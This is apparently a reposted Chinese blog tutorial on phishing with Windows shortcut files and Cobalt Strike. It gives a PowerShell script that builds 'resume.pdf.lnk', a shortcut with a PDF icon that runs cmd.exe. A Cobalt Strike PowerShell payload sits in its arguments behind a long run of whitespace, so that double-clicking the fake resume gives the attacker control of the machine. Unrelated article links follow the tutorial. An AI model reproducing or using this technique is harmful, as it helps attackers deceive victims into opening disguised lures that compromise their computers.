CS Ink钓鱼

Posted Ybit

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CS Ink钓鱼相关的知识,希望对你有一定的参考价值。

CS+Ink钓鱼

.ink文件

windows的快捷方式

快捷方式


测试

使用powershell运行计算器,右键使用powershell运行即可打开计算器。

cmd /c calc.exe

image

生成PowerShell

  1. CS生成powershell Command
    image
    image
  2. 成功生成后替换calc.exe
    image
  3. 新建另一个ps1文件,内容如下
$file = Get-Content "ink.ps1"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("resume.pdf.lnk")
$Shortcut.TargetPath = "%SystemRoot%\\system32\\cmd.exe"
$Shortcut.IconLocation = ".\\pdf.pdf"
$Shortcut.Arguments = \'                                                                                                                                                                                                                                    \'+ $file
$Shortcut.Save()
  1. 右键使用powershell运行后会生成一个resume.pdf的快捷方式,双击运行即可CS上线
    image

以上是关于CS Ink钓鱼的主要内容,如果未能解决你的问题,请参考以下文章

CobaltStrike使用-第四篇(鱼叉钓鱼攻击-细思极恐)

Unity报错:Read only asset Packages/com.xxxxx.xxx.xxxx/Editor/VSCodeDiscovery.cs.IPGSD has no meta(代码片段

Unity报错:Read only asset Packages/com.xxxxx.xxx.xxxx/Editor/VSCodeDiscovery.cs.IPGSD has no meta(代码片段

csharp 片段 - 2930086830.cs

csharp 片段 - 1207922314.cs

csharp 片段 - 7046009033.cs